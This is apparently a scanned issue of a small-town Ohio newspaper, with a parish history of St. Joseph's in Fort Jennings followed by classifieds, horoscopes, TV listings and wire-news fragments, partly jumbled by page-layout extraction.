BEIRUT (AP) —. Human rights groups say more than 20,000 people have been killed in Syria since the uprising against Assad erupted in March 2011 and evolved into a civil war. The bloodshed already has spilled over into neighboring countries.
Andy North
Financial Advisor
1122 Elida Avenue Delphos, OH 45833 419-695-0660
Member SIPC
2012 Model ClearanCe
2012 CHEV IMPALA
#12NC904. 1 LT pkg., spoiler, aluminum wheels. Up to 30 MPG EPA EST. MSRP................................................$28,190.00 DELPHA DISCOUNT ...............................636.63 SUPPLIER PRICE ..............................27,553.37 REBATE ................................................3,750.00 23,803.37 LOVE IT OR LEAVE REBATE .................500.00
2012 CHEV SONIC
5 door. #1290961. 10 air bags, anti-lock brakes, auto. trans., orange. Up to 35 MPG EPA EST. NOW .................................................$17,415.16 LOVE IT OR LEAVE IT REBATE .............250.00
2012 CHEV 1/2 TON XTD CAB
$
23,30337*
2012 BUICK LaCROSSE
$
93*
$
17,16516*
#12NT980. 4x4, LS pkg., 4.8 V8, HD trailering. MSRP................................................$34,930.00 DELPHA DISCOUNT ............................1,899.95 SUPPLIER PRICE ..............................33,030.05 REBATE ................................................3,500.00 LOVE IT OR LEAVE IT REBATE .............500.00 TRADE IN BONUS CASH......................1000.00
$
2012 CHEV 1/2 TON CREW CAB
28,03005*
#12NT879. 4x4, 1 LT pkg., 5.3 V8, All Star Edition, chrome steps. MSRP................................................$39,404.00 DELPHA DISCOUNT ............................2,284.97 SUPPLIER PRICE ..............................37,119.03 REBATE ................................................2,500.00 LOVE IT OR LEAVE REBATE 500.00 TRADE IN BONUS CASH 1000.00
#12NB154. Red.
2012 BUICK ENCLAVE
per month
#12NB985. Silver.
$1500 down plus tax, fees and plates.
$
33,119
39 mo. lease, 12,000 miles per year with approved credit through ally 20¢ per mile extra for excess mileage
27607
$1500 down plus tax, fees and plates.
$
39 mo. lease, 12,000 miles per year with approved credit through ally 20¢ per mile extra for excess mileage
39078
2011 CHEV IMPALA ............................... 12D33 2012 CHEV IMPALA ............................... 12D39
2012 CHEV IMPALA ............................... 12F69 2012 CHEV MALIBU............................... 12C24
PRE-OWNED VEHICLES
1725 East Fifth Street, Delphos VISIT US ON THE WEB @
Service - Body Shop - Parts Mon., Tues., Thurs. & Fri. 7:30 to 5:00 Wed. 7:30 to 7:00 Closed on Sat.
CHEVROLET • BUICK
IN DELPHOS 419-692-3015 TOLL FREE 1-888-692-3015
Sales Department Mon. & Wed. 8:30 to 8:00 Tues., Thurs. & Fri. 8:30 to 5:30; Sat. 8:30 to 1:00
2011 BUICK REGAL ............................... 12G20 2011 CHEV CRUZE ................................ 12G51A 2011 CHEV IMPALA ............................... 12D35 2011 CHEV IMPALA ............................... 12D34 2011 CHEV IMPALA ............................... 12G55A 2011 CHEV IMPALA ............................... 11K152 2011 CHEV MALIBU ............................... 11I125 2011 CHEV SILVERADO 1500 ............... 12B12 2011 CHEV SILVERADO 1500 ............... 12E48 2010 CHEV EQUINOX ............................ 12F71 2010 CHEV IMPALA ............................... 12E58 2010 CHEV IMPALA ............................... 11I108 2010 CHEV MALIBU............................... 12G76 2009 BUICK LaCROSSE ........................ 12A1 2009 PONTIAC G6.................................. 12E66 2009 PONTIAC VIBE .............................. 11L162 2008 CHRYSLER ASPEN Limited ......... 12H85 2008 BUICK ENCLAVE .......................... 12H78 2008 BUICK LUCERNE .......................... 12F50A
2008 CHEVROLET HHR......................... 12G73A 2008 GMC ENVOY.................................. 11K154 2008 PONTIAC G6.................................. 12E67 2007 CHEVY EQUINOX LT..................... 12H82 2007 BUICK LUCERNE .......................... 11H96 2007 BUICK RENDEZVOUS .................. 11L163 2007 CHEV AVALANCHE....................... 12E61 2007 CHEVROLET COLORADO ........... 12D32 2007 CHEV EQUINOX ............................ 12H82 2006 CHEV TRAILBLAZER ................... 12E59 2005 BUICK RENDEZVOUS .................. 12F70 2004 CHEVY SILVERADO 4x4 WT ........ 12H74A 2004 CHEV SILVERADO 1500 ............... 12H74A 2003 CHEV SILVERADO EXT. 1/2 ton 4x4 . 12H68A 2003 CHEV TRAILBLAZER ................... 12E42A 2001 PONTIAC GRAND AM COUPE ..... 12H84 2001 FORD FOCUS 4 dr. ....................... 12H92A 2000 PONTIAC GRAND PRIX ................ 12E33C 1995 BUICK LeSABRE Custom ............ 12H83
12– The Herald
Saturday, August 25, 2012
There’s never been a better time to save on a new Ford from Statewide.
1,500
199 24
0.0
1,750
1,500
179 24
SYNC® AppLink"
SYNC® with MyFord® or SYNC® with MyFord Touch®
Easy Fuel® � Capless Fuel-Filler
4
1,500 $1999
1,500
199 24 0.0 1,750 SYNC® with MyFord® or SYNC® with MyFord Touch® 199 24
SYNC® with MyFord® or SYNC® with MyFord Touch®
0.0 1,750 1.9Fuel® � Capless Fuel-Filler 2,750 Easy 0.0 1,750
60 months
0.0 179
1,500
1,500 $2279
179 24 60
60 SYNC® AppLink" 750
24
5,750
Trade Assistance
Easy Fuel® � Capless Fuel-Filler
5.0L V8 SYNC® AppLink"
2013 ESCAPE SE
$ 0.0
1,0001,750 CASH BACK*
1,750 mon, wed 9-8 tue, thur, fri 9-6 sat 9-6 sun closed
1.9 0 1.9
1108 West Main St 2013 Van Wert Ohio, 45891 419-238-0125 800-262-3866
$
mon - fri 7:30-5:00 sat, sun closed
2,000 2,750
0.0
2005 Mercury Grand Marquis
5.0L V8 *Lease is 10,500 miles per year with approved credit through Ford Credit. Offer expires 10/1/12.
60
750
# 501549A. Local trade-in, non-smoker, extra clean, priced to sell!!
$
# 501339A. All wheel drive, leather, power moonroof, hard to find!!
2005 Mercury Montego Premier
6744
# 40102B. Power moonroof, leather, spoiler, alloys, a must see!!
2002 Chevy Impala LS
USED CARS
1108 West Main St Van Wert Ohio, 45891 419-238-0125 800-262-3866
2,750
0.0 0.0
UP TO
60 INCLUDES $1,000 TRADE ASSISTANCE Trade Assistance 750
5,750 BACK $5,000 CASH 5,750
Trade Assistance
$
$
$
# 40060A. 1-owner, heated leather, moonroof, chrome wheels!!
2010 Ford Escape Limited
9399
# 9992A. Only 24,000 miles!! 1-owner, power moonroof, non-smoker!
# 501099A. Chrome wheels, 24,000 miles, extra clean!!
# 50174P. Local car, 1-owner, heated leather!!
2006 Pontiac G6 | 2009 Dodge Avenger | 2009 Nissan Altima
1108 West Main St, Van Wert, Ohio 45891. 419-238-0125 / 800-262-3866. Sales: mon, wed 9-8; tue, thur, fri 9-6; sat 9-6; sun closed. Service: mon-fri 7:30-5:00; sat, sun closed.
6987
$
# 14527ATrailer tow, running boards, only 71,000 miles!!
2002 Chevy Tahoe LS 4X4
8829
# 50153P. Alloy wheels, leather, Lincoln luxury!!
2006 Lincoln Zephyr
5.0L V8
$
8968
$
# 501309A4X4, 5.4 V8, local trade-in, priced to sell!!
2005 Ford F-150 Supercab FX4
8995
2009 Ford Flex SE
$
18,498
# 50163P. The right color!! Fiberglass cap, V8, extra clean!!
2010 Ford F 150 Supercrew
9997
mon, wed 9-8 tue, thur, fri 9-6 sat 9-6 sun closed
$
12,989
2011 Ford Edge Limited
mon - fri 7:30-5:00 sat, sun closed
$
14,997
2012 Ford Flex SEL
$
# 50167P. 7 passenger, great fuel economy, don’t miss it!!
16,941
2012 Dodge Durango R/T
$
20,896
$
# 50136P. Chrome wheels, rear camera, sync, my ford touch!!!
23,890
# 50093P. Only 15,000 miles! 7 passenger, Sync, reverse sensing!
$
24,825
$
# 40058B. Only 9200 miles! Like new, 1-owner, Nav, moonroof, WOW!
33,997
StateWide
Go Further
800-262-3866 or 419-238-0125
Mon. & Wed. 9 AM - 8 PM; Tues., Thurs., Fri. 9 AM-6 PM; Sat. 9 AM-3 PM
1108 West Main St. Van Wert, OH
I am having some issues. I logged in to Moralis using my wallet, and now I want to display all the NFTs in my wallet on a panel in Unity. How can I fetch the NFT data in Unity, and how can I use the NFT image to display on a panel in Unity? Please help, anyone.
An example of how to make them render will be here
unlike the example in the docs, this project is deprecated and contains alot of invalid syntax (old moralis unity sdk version), you can use the render nft part along with the syntax on the docs for fetching the nft to render
I checked this, but what exactly do I need to extract chain id and other details from the database and then pass that into the parameters instead of directly adding the address.
which details from the database ?
you can use the connected user address and any chain
okay, thanks for your reply I’ll try and check what can I do…
@0xprof actually I am trying to fetch all the nfts that are in my wallet and want to display them in unity…I checked the above methods but there seems to be something I am not getting correctly, how should I add all those nft metadata from my wallet to moralis database, so that I can fetch them in unity…If you have any working code or example please help.
you can place them in the db, but you dont need them there, you can fetch using the web3api and then displaythem, but if you cant to fetch and place them in the db, it is fairly the same process, you can fetch and then push it to the db and then displythem from the db
Hi,
I am essentialy trying to populate an nft inventory system on top of the mmorg project but Im getting stuck at the first step. I am confused as the web3 sign in and photon are working great.
Im trying to add the example Unity code snippet posted above “” to the " Web3 MMORPG Example Demo" in Unity but im getting an error “CS0246: The type or namespace name ‘MoralisUnity’ could not be found”.
I have used the similar inventory functionality in the other project " Build an In-Game Unity NFT Shop" and it compiles and works fine.
Im not sure if im using the wrong sdk or if ones not compatible with another but any advice would be appreciated.
That snippet is for SDK versions 1.2.0 or newer.
You can use the older
using System.Collections.Generic; using Moralis.Web3Api.Models; using MoralisWeb3ApiSdk; public async void fetchNFTs() { NftOwnerCollection polygonNFTs = await MoralisInterface.GetClient().Web3Api.Account.GetNFTs("0x75e3e9c92162e62000425c98769965a76c2e387a".ToLower(), ChainList.polygon); print(polygonNFTs.ToJson()); }
okay thankyou so much, I will give that a try tomorrow and let you know how it goes
so the code does compile now as I was trying to use the older version of the SDK, now for the fun part of trying to add a nft display method to my ui panel
out of curiosity, should I be okay to continue build and publish my project on a previous sdk or is the newer version recommened? If so, it would be really helpful if the dev’s could update the Unity boilerplate projects to work with the latest sdk version
It is recommended you use the newer SDK if you are able to migrate existing/older code over, and for new projects.
ah okay thankyou I will use the newer sdk, the video is also very helpfull
how to do for any chain user used while login with metamask
public async void fetchNFTs() { NftOwnerCollection polygonNFTs = await Moralis.Web3Api.Account.GetNFTs("0x75e3e9c92162e62000425c98769965a76c2e387a".ToLower(), ChainList.polygon); Debug.Log(polygonNFTs.ToJson()); }
This is an example you can look at to get the current wallet address.
This gets the detail but I am not able to fetch any image from this method…can you please if possible explain in detail…
I was following the same tutorial but have few differences that make all issue I guess.
- I don’t have minted nfts, all the nfts are in my wallet
- So there’s no shop inventory, I fetched the nfts with moralis function shown in tutorial, but then not able to display it.
What I did use the same code and fetch the nft detail but my nfts are not showing, please help me in detail if possible.
I want to make user login with metamask, then on some pannel all nfts present in person’s wallet should be displayed. | https://forum.moralis.io/t/display-all-nfts-in-unity/15691 | CC-MAIN-2022-40 | refinedweb | 767 | 54.6 |
When Java developers come to a task of writing a a new class which should have a
Map datastructure field, accessed simultaneously by several threads, they usually try to solve the synchronization issues invloved in such a scenario by simply making the map an instance of
ConcurrentHashMap .
public class Foo { private Map<String, Object> theMap = new ConcurrentHashMap<>(); // the rest of the class goes here... }
In many cases it works fine just because the contract of
ConcurrentHashMap takes care of the potential synchronization issues related to reading/writing to the map. But there are cases where it's not enough, and a developer gets race conditions which are hard to predict, and even harder to find/debug and fix.
Let's have a look, at the next example:
public class Foo { private Map<String, Object> theMap = new ConcurrentHashMap<>(); public Object getOrCreate(String key) { Object value = theMap.get(key); if (value == null) { value = new Object(); theMap.put(key, value); } return value; } }
Here we have a "simple" getter (
getOrCreate(String key) ), which gets a key and returns the value assosiated with the given key in
theMap . If there is no mapping for the key, the method creates a new value, inserts it into
theMap and returns it.
So far so good. But what happens when 2 (or more) threads call the getter with the same key when there is no mapping for the key in
theMap? In such a case we might receive a race condition:
Suppose thread t1 enters the function and comes to line 7. Its value is
null . At this point thread t2 enters the function and also comes to line 7. Its value is also obviously
null . Therefore from this point the two threads will enter the
if statement and execute lines 8 and 9, thus creating two different new
Objects. Upon returning from the getter each thread will get a different
Object instance, violating programmer's wrong assumption that by using
ConcurrentHashMap "everything is synchronized" and therefore two different threads should get the same value for the same key.
To solve this issue we can synchronize the entire method, thus making it atomic:
public class Foo { private Map<String, Object> theMap = new ConcurrentHashMap<>(); public synchronized Object getOrCreate(String key) { Object value = theMap.get(key); if (value == null) { value = new Object(); theMap.put(key, value); } return value; } }
But this is a bit ugly, and uses
Foo instace's monitor, which may affect performance if there are other methods in this class which are
synchronized. Also a common rule of thumb is to try to eliminate using synchronized methods as much as possible.
A much better approach should be using Java 8
Map's
computeIfAbsent(K key, Function
mappingFunction), which, in
ConcurrentHashMap's implementation runs atomically:
public class Foo { private Map<String, Object> theMap = new ConcurrentHashMap<>(); public Object getOrCreate(String key) { return theMap.computeIfAbsent(key, k -> new Object()); } }
The atomicity of
computeIfAbsent(..) assures that only one new
Object will be created and put into
theMap, and it'll be the exact same instance of
Object that will be returned to all threads calling the
getOrCreate function.
Here, not only the code is correct, it's also cleaner and much shorter.
The point of this example was to introduce a common pitfall of blindly relying on
ConcurrentHashMap as a majical synchronzed datastructure which is threadsafe and therefore should solve all our concurrency issues regarding multiple threads working on a shared
Map.
ConcurrentHashMap is, indeed, threadsafe. But it only means that all read/write operations on such map are internally synchronized. And sometimes it's just not enough for our concurrent environment needs, and we have to use some special treatment which will guarantee atomic execution. A good practice will be to use one of the atomic methods implemented by
ConcurrentHashMap, i.e:
computeIfAbsent(..),
putIfAbsent(..), etc.
{{ parent.title || parent.header.title}}
{{ parent.tldr }}
{{ parent.linkDescription }}{{ parent.urlSource.name }} | https://dzone.com/articles/concurrenthashmap-isnt-always-enough | CC-MAIN-2017-26 | refinedweb | 646 | 50.26 |
Jellified Light weight switch web component built on vanilla javascript
jelly-switch
A simple, customizable and jellified switch built as web component using ES6 javascript
NOTE:
- This component is still in work in progress WIP. So there is a high chance that the API can change. So please be notified
This micro web component(~1.7kB) can be used for any framework
Try Now
Install
1. via npm
npm i jelly-switch
(or)
2.via script tag
<script src =""></script>
Usage
1.Import into module script(required only for npm install):
import { JellySwitch } from "jelly-switch"
2.Use it in your web page like any other HTML element
<jelly-switch</jelly-switch>
3. Like any other input type, label can be used to bind with the jelly-switch element using 'slot' attribute as shown below. For more information on this, refer the Slots sub section in API section
<jelly-switch <p slot="content-left">On/Off</p> </jelly-switch>
API
Attributes
checked
Add this attribute to set the switch to toggled / checked mode i.e., equivalent to 'checked' attribute of input type
<jelly-switch id="js1" checked></jellyswitch>
(or)
js1.checked = true
disabled
Add this attribute to disable the switch and the opacity will be decreased to half and user can not interact with the switch and cursor will be changed to 'not-allowed'
<jelly-switch id ="js1" disabled></jellyswitch>
(or)
js1.disabled = true;
Slots
- For achieving the
labelbinding with the
inputby
forattribute,
slotfeature has been used in this custom element
- For label to position to left of the
jelly-switch, slot attribute with the value
content-leftcan be used for any other native HTML Element as shown in the example below
<jelly-switch> <p slot="content-left">On/Off</p> </jelly-switch>
- For label to position to right of the
jelly-switch, slot attribute with the value
content-rightcan be used for any other native HTML Element as shown below
<jelly-switch> <p slot="content-right">On/Off</p> </jelly-switch>
Styling
The switch component can be styled as a normal and regular HTML element in CSS. There are list of CSS properties below with the default values
The CSS variables can be set dynamically. For example, refer the following snippet
document.documentElement.style.setProperty('--off-color', 'rgba(25,89,79,0.7');
Events
toggle
- The toggle event is triggered when the user toggles the switches either by
- clicking on the switch (or)
- pressing
spaceon the keyboard when the switch is focused
- The present value can be accessed from
event.detail.valueas shown in the below example
document.documentElement.addEventListener('toggle',handleToggle(e));
or
<jelly-switch</jelly-switch>
and value can be obtained as follows
function handleToggle(e) { //The value after the user toggles the switch can be accessed from the below code console.log('The present value of switch is '+e.detail.value); //here e is the event object }
Accessibility
- ARIA has been handled
ToDos
- [x] Handle keyboard
spaceevent
- [x] Add box-shadow to focus
- [x] Accessibility check
- [x] Basic Unit testing
- [x] Lazy property handling
- [x] Documentation
- [x] npm publish
- [x] Add label 'for' support
- [x] Minify js file
- [x] Support safari browser
- [ ] Writing the release notes (changeLog.md file)
- [ ] Adding unit test cases
- [ ] Write contribute.md file
- [ ] handling drag event
License
MIT License (c) Akhil Sai
Made with ❤️ by Akhil | https://vaadin.com/directory/component/akhil0001jellyswitch/0.2.3 | CC-MAIN-2021-49 | refinedweb | 554 | 57.81 |
5. Type System¶
5.1. Type inference¶
Static Typing (Java, C++, Swift)
String name = new String("José Jiménez")
Dynamic Typing (Python, PHP, Ruby)
name = str('José Jiménez')
Type inference
name = 'José Jiménez'
5.2. Type Annotations¶
Types are not required, and never will be – Guido van Rossum, Python BDFL
Since Python 3.5
SyntaxErrorin Python before 3.5
Sometimes called “type hints”
Good IDE will give you hints
Types are used extensively in system libraries
More and more books and documentations use types
To type check use:
mypyor
pyre-check(more in CI/CD Tools)
5.2.2. Collections¶
my_list: list = list() my_set: set = set() my_tuple: tuple = tuple() my_dict: dict = dict()
my_list: list = [] my_set: set = set() my_tuple: tuple = () my_dict: dict = {}
from typing import List, Tuple, Dict, Set my_list: List[float] = [5.8, 2.7, 5.1, 1.9] my_set: Set[int] = {0, 2, 4} my_tuple: Tuple[str] = ('setosa', 'virginica', 'versicolor') my_dict: Dict[int, str] = {0: 'setosa', 1: 'virginica': 2: versicolor}
5.2.3. Types do not enforce checking¶
This code will run without any problems
Although
mypyor
pyre-checkwill throw error
name: int = 'Jan Twardowski' age: float = 30 is_adult: int = True
5.2.4. Why?¶
Good IDE will highlight, incorrect types
def sum_numbers(a: int, b: float) -> int: return int(a + b) sumuj_liczby(1, 2.5) sumuj_liczby('a', 'b')
5.2.5. More advanced topics¶
Note
The topic will be continued in chapter: Type Annotation
5.3. Problematic types¶
5.3.1.
dict vs.
set¶
Both
setand
dictkeys must be hashable
Both
setand
dictuses the same
{and
}braces
Despite similar syntax, they are different types
my_data = {} isinstance(my_data, dict) # True isinstance(my_data, set) # False my_data = {1} isinstance(my_data, dict) # False isinstance(my_data, set) # True my_data = {1: 1} isinstance(my_data, dict) # True isinstance(my_data, set) # False
{} # dict {1} # set {1, 2} # set {1: 2} # dict {1, 2,} # set {1: 2,} # dict {1: 2, 3: 4} # dict {1, 2, 3, 4} # set
5.3.2.
tuple vs.
str¶
what = 'foo' # str what = 'foo', # tuple with str what = 'foo'. # SyntaxError: invalid syntax
what = ('foo') # str what = ('foo',) # tuple with str what = ('foo'.) # SyntaxError: invalid syntax
5.3.3.
tuple vs.
float and
int¶
what = 1.2 # float what = 1,2 # tuple with two int what = (1.2) # float what = (1,2) # tuple with two int
what = 1.2, # tuple with float what = 1,2.3 # tuple with int and float what = (1.2,) # tuple with float what = (1,2.3) # tuple with int and float
what = 1. # float what = .5 # float what = 1.0 # float what = 1 # int what = (1.) # float what = (.5) # float what = (1.0) # float what = (1) # int
what = 10.5 # float what = 10,5 # tuple with two ints what = 10. # float what = 10, # tuple with int what = 10 # int what = (10.5) # float what = (10,5) # tuple with two ints what = (10.) # float what = (10,) # tuple with int what = (10) # int
what = 1.,1. # tuple with two floats what = .5,.5 # tuple with two floats what = 1.,.5 # tuple with two floats what = (1.,1.) # tuple with two floats what = (.5,.5) # tuple with two floats what = (1.,.5) # tuple with two floats | http://python.astrotech.io/data-methods/type-system.html | CC-MAIN-2019-18 | refinedweb | 524 | 75.81 |
Tax
Have a Tax Question? Ask a Tax Expert
Hello
If you are trying to file past year return (earlier than 2015) you are going to need to mail those because e-file is not available for prior years.
The Goodwill Industries has started in many places to do free returns also VITA offers free services for filing. Will they do a prior year I do not know but you can see.
You are required to click a positive rating if I am to be credited with the response.You have to actively click on a rating and click submit. Smiley Faces or Stars. | http://www.justanswer.com/tax/9m1n5-wichita-kansas-trying-file-taxes.html | CC-MAIN-2017-13 | refinedweb | 104 | 73.58 |
Prorgammers are lazy, we all know that. Whenever we come across some API we want to make a wrapper for it in order to use it more easily. Microsoft wrote its "Foundation Classes", and every day someone posts an article about his own new wrapper class here on CodeProject.com. I have also decided to do so.
I needed to control my Winamp2 from another app, and after doing some research if finally found the fine Winamp2 API documentation. But after a few minutes I was tired to type all those
SendMessages with a number as parameter that no one on earth would want to remember. After playing around with the official Winamp2 API I had to discover that the API doesn't provide some handy functions such like getting the current volume. So what now? Well, I began writing the wrapper. Soon I started Spy++ to get access to some handy but undocumented API calls, e.g. reading the volume or generating a HTML playlist. Woohoo! Now I felt it was time to share my work with you :-)
My main goal was to keep the wrapper simple as possible, so that even beginners would have no problems using it. The result is one single header-file that needs to be included to your workspace. No more! Now let's start, I'll explain the most important steps and functions.
Using this class is easy as can be. Just
#include "winamp2.h" to your workspace. Next, create our wrapper class variable somewhere in your project:
CWinamp amp // create the wrapper variable named "amp"
Before you can use all the functions you need to
FindWinamp(). For most people it safe enough to call this function without any parameters. Winamp can be opened with a different window class but the standard "Winamp v1.x" by starting it with the parameter /CLASS. But most people don't do so, so you don't have to worry about the
FindWindow() parameter. The function returns
true, if Winamp has been found. Now you are ready to use all the nifty functions.
There are so many functions that I don't want to explain them all in detail. These are probably the most important ones:
void Previous(); void Next(); void Play(); void Pause(); void Stop(); const char* GetCurrentTitle()
Should be self-explanatory I hope :-) So if you want to go to the next track just call the
Next() function like that:
CWinamp amp; if(amp.FindWinamp()) { // Winamp has been found, play next track amp.Next(); }
The functions all have names that explain what they do, e.g.
TrackGetPositionMSec(). This returns the track's current postion in milliseconds. There are three functions that need to be discussed a bit more in detail, but acutally they are easy to use as well. The functions are as follows:
int GetVolume(); void SetVolume(int volume); int EQGetData(int band); void EQSetData(int band, int value); int EQGetPreampValaue();
The
GetVolume() functions returns a value between 0 and 255. 0 means volume turned off completely (i.e. silent), whereas 255 means full volume. This way you can pass a value of 0 to 255 to
SetVolume().
EQGetData(int band) takes a value of 0-9 as parameter, representing one of the ten bands of the equalizer. It returns a value between 0 and 63. 0 means a value of -20 dB and 63 a value of +20 dB. Consider this, if you want to represent the value by e.g. a
CSliderCtrl, make sure to set its range like that:
SetRange(0, 63). To set the value of a specific band, call
EQSetData(). The first parameter is the band (0-9), the second the value in the range from 0-63.
Note: For some reason, Winamp does NOT refresh the equalizer bars during runtime, but the changes are applied. You need to
RestartWinamp() to make the changes visible in the equalizer. Blame the programmers of winamp ;-)
EQGetPreampValaue() also returns the preamp value in the range of 0-63.
I'd say this is everything you need to know in order to understand the class. If you have any futher questions, feel free to post a comment or send me a mail. The class has been successfully tested with Winamp 2.81
General
News
Question
Answer
Joke
Rant
Admin | http://www.codeproject.com/KB/audio-video/winamp2api.aspx | crawl-002 | refinedweb | 716 | 73.88 |
At VueConf Toronto, Ionic announced the first alpha release of
@ionic/vue, making it possible to add Ionic 4 to any Vue.js project, getting access to Ionic's APIs in a Vue.js-friendly manner.
Ionic lets web developers build, test, and deploy cross-platform hybrid mobile apps. Before version 4, Ionic's primary focus was Angular, but with Ionic 4 the goal is to make Ionic work seamlessly with any framework to provide a flexible user interface component layer.
The Ionic team wanted to verify the success of the Vue.js and Ionic integration to ensure independence from Angular. Through a collaboration with Modus Create, the viability of Ionic and Vue.js integration was put to the test. Modus leverages Ionic Framework, Vue.js, and Capacitor to create Beep,an app using Ionic Framework, Vue, and Capacitor that allows anyone to check if their email has been part of any data breaches.
To use Ionic within a Vue.js application, install the
@ionic/vue package with npm:
npm install @ionic/vue
Then, with the application's main.js, import the Ionic framework:
import Vue from 'vue'; import App from './App.vue'; import { Ionic } from '@ionic/vue'; Vue.use(Ionic); new Vue({ render: h => h(App) }).$mount('#app');
Ionic is an open source Framework with a collection of UI components for building cross-platform applications using HTML, CSS, and JavaScript. Ionic applications can get deployed natively to iOS and Android devices, to the desktop with Electron, or as progressive web apps.
According to Mike Hartington of Ionic, The Ionic team seeks early feedback on how to improve
@ionic.vue:
We’ve always said that Ionic’s biggest asset is our large, passionate community and now we need your feedback. If you’re a big Vue fan and want to give Ionic Framework a try, let us know how it goes. You can reach out to us on the Ionic forum, slack, or GitHub.
Initial community feedback via Twitter is mostly positive. John Papa, principal developer advocate at Microsoft, asked about plans for integrating Ionic with the vue-cli add command, and received confirmation from Hartington that Ionic will "offer a vue project type from our cli, as well as a plugin to add."
With the recent NativeScript support for Vue.js and now Ionic, full-stack deveoper Rich Klein expresses interest in
@ionic/vue:
Vue.js is on a hot streak. Definitely want to test this for a project when the beta is ready.
@ionic/vue is available under the MIT open source license. Contributions are welcome via the
@ionic/vue GitHub package and should follow the Ionic contribution guidelines and code of conduct.
Community comments | https://www.infoq.com/news/2018/11/ionic-vue-integration-alpha/?utm_campaign=infoq_content&utm_source=infoq&utm_medium=feed&utm_term=global | CC-MAIN-2021-04 | refinedweb | 447 | 57.06 |
Compile Error for Import com.sun.javadoc.*;
I need to write some simple doclets and found some beginner code on the Sun website. The first line of the sample app is:
import com.sun.javadoc.*;
However, I get a compile error:
C:\JavaDoc\Doclet\ListClass.java:1:package com.sun.javadoc does not exist
import com.sun.javadoc.*;
I found the com.sun.javadoc package in the tools.jar file in the lib directory of my sdk. So I added the following to my classpath:
C:\j2sdk1.4.2_08\lib;
Then I recompiled but received the same error. What have I done wrong? I'm on Windows XP.
TIA. | http://www.java-index.com/java-technologies-archive/513/java-compiler-5134686.shtm | crawl-001 | refinedweb | 109 | 64.07 |
Introduction: Waveshare EPaper and a RaspberryPi
I'm a display nerd, I know. So I got this Waveshare ePaper 2.9" display from ama...n, and it was a little nasty to adapt the software, so here is how it went for me.
What to expect:
Some Python code for the Raspberry Pi to run this display.

- uses good old Python Imaging Library (PIL)
- can load any image
- allows image manipulation and drawing
References
Here is the Waveshare wiki page with the somewhat useful info you may need. Unfortunately it is missing info about the memory layout, just to know where I can expect to write a bit for a certain pixel. It also lacks timing info: the code does a lot of delays, and there is a busy pin to read from, but when and how do I use which??? The code also contains initialization data that is copied to the display, and you will get no clue what it is. And no, the PDF document about the display does not reveal this either.
After some experimentation I can get a refresh rate of about 2 fps for a complete image refresh with the partial update function. The pixels do not completely reset; I guess you need to do the long refresh cycle, which inverts everything a few times, to get a completely clean display back.
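To put the 2 fps into perspective: the amount of data per frame is tiny, so the time goes into the panel's update waveform, not the SPI transfer. A quick back-of-the-envelope sketch (the 2 MHz SPI clock is my assumption, not a datasheet value):

```python
# One full frame on the 2.9" panel: 128 x 296 pixels at 1 bit per pixel.
width, height = 128, 296
frame_bytes = width * height // 8
print(frame_bytes)  # 4736

# At an assumed SPI clock of 2 MHz, shifting a whole frame out takes
# only a few milliseconds - far less than the ~500 ms per refresh seen.
spi_hz = 2000000
transfer_ms = frame_bytes * 8 * 1000.0 / spi_hz
print(round(transfer_ms, 1))  # 18.9
```

So even at a modest SPI clock the waiting happens inside the panel, which matches the busy pin being the thing to watch.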
Update:
Extensive explanation of the Waveshare example code...
Connections to Raspberry
I used a Pi3 but it should work with any.
Search the web for "Raspberry pinout", e.g. this one, and match it with the Waveshare doc, or simply use this table:
e-Paper   RaspberryPi
3.3V      3.3V  (pin1)
GND       GND   (pin6)
DIN       MOSI  (pin19)
CLK       SCLK  (pin23)
CS        CE0   (pin24)
DC        BCM25 (pin22)
RST       BCM17 (pin11)
BUSY      BCM24 (pin18)
The Code
There is main.py, which runs the fancy stuff, and there is EPD_driver.py, which is a stripped down version of the interfacing code provided by Waveshare. I threw out almost everything that did not just copy an image to the display - it.. eh.. well they tried, but putting the frame together is much easier done on the Pi and then copied over with a single command.
Just download the attached paperDisp.zip. Then run the code with "python main.py". You will need to install at least the PIL and GPIO python libs like this:
sudo apt-get install python-requests python-pil python-rpi.gpio
Also make sure the SPI is enabled, edit /boot/config.txt and uncomment the line
dtparam=spi=on
main.py - this initializes the display, gets some data from a duckduckgo search and displays it along with the current time. (instructables messed up the code, use the attached zip file)
#!/usr/bin/python
import spidev as SPI                  # where the display connects
import Image, ImageDraw, ImageFont    # PIL - PythonImageLibrary
import time, datetime, sys, signal, urllib, requests
from EPD_driver import EPD_driver

def handler(signum, frame):
    print 'SIGTERM'
    sys.exit(0)

signal.signal(signal.SIGTERM, handler)

bus = 0
device = 0
disp = EPD_driver(spi = SPI.SpiDev(bus, device))
print "disp size : %dx%d"%(disp.xDot, disp.yDot)

print '------------init and Clear full screen------------'
disp.Dis_Clear_full()
disp.delay()

# display part
disp.EPD_init_Part()
disp.delay()

imagenames = []
search = ""
if search:
    req = requests.get(search)
    if req.status_code == 200:
        for topic in req.json()["RelatedTopics"]:
            if "Topics" in topic:
                for topic2 in topic["Topics"]:
                    try:
                        url = topic2["Icon"]["URL"]
                        text = topic2["Text"]
                        if url:
                            imagenames.append( (url,text) )
                    except:
                        # print topic
                        pass
            try:
                url = topic["Icon"]["URL"]
                if url:
                    imagenames.append( url )
            except:
                # print topic
                pass
    else:
        print req.status_code

# font for drawing within PIL
myfont10 = ImageFont.truetype("amiga_forever/amiga4ever.ttf", 8)
myfont28 = ImageFont.truetype("amiga_forever/amiga4ever.ttf", 28)

# mainimg is used as screen buffer, all image composing/drawing is done in PIL,
# the mainimg is then copied to the display (drawing on the disp itself is no fun)
mainimg = Image.new("1", (296,128))
name = ("images/downloaded.png", "bla")
skip = 0
while 1:
    for name2 in imagenames:
        print '---------------------'
        skip = (skip+1)%7
        try:
            starttime = time.time()
            if skip==0 and name2[0].startswith("http"):
                name = name2
                urllib.urlretrieve(name[0], "images/downloaded.png")
                name = ("images/downloaded.png", name2[1])
            im = Image.open(name[0])
            print name, im.format, im.size, im.mode
            im.thumbnail((296,128))
            im = im.convert("1") #, dither=Image.NONE)
            # print 'thumbnail', im.format, im.size, im.mode
            loadtime = time.time()
            print 't:load+resize:', (loadtime - starttime)
            draw = ImageDraw.Draw(mainimg)
            # clear
            draw.rectangle([0,0,296,128], fill=255)
            # copy to mainimg
            ypos = (disp.xDot - im.size[1])/2
            xpos = (disp.yDot - im.size[0])/2
            print 'ypos:', ypos, 'xpos:', xpos
            mainimg.paste(im, (xpos,ypos))
            # draw info text
            ts = draw.textsize(name[1], font=myfont10)
            tsy = ts[1]+1
            oldy = -1
            divs = ts[0]/250
            for y in range(0, divs):
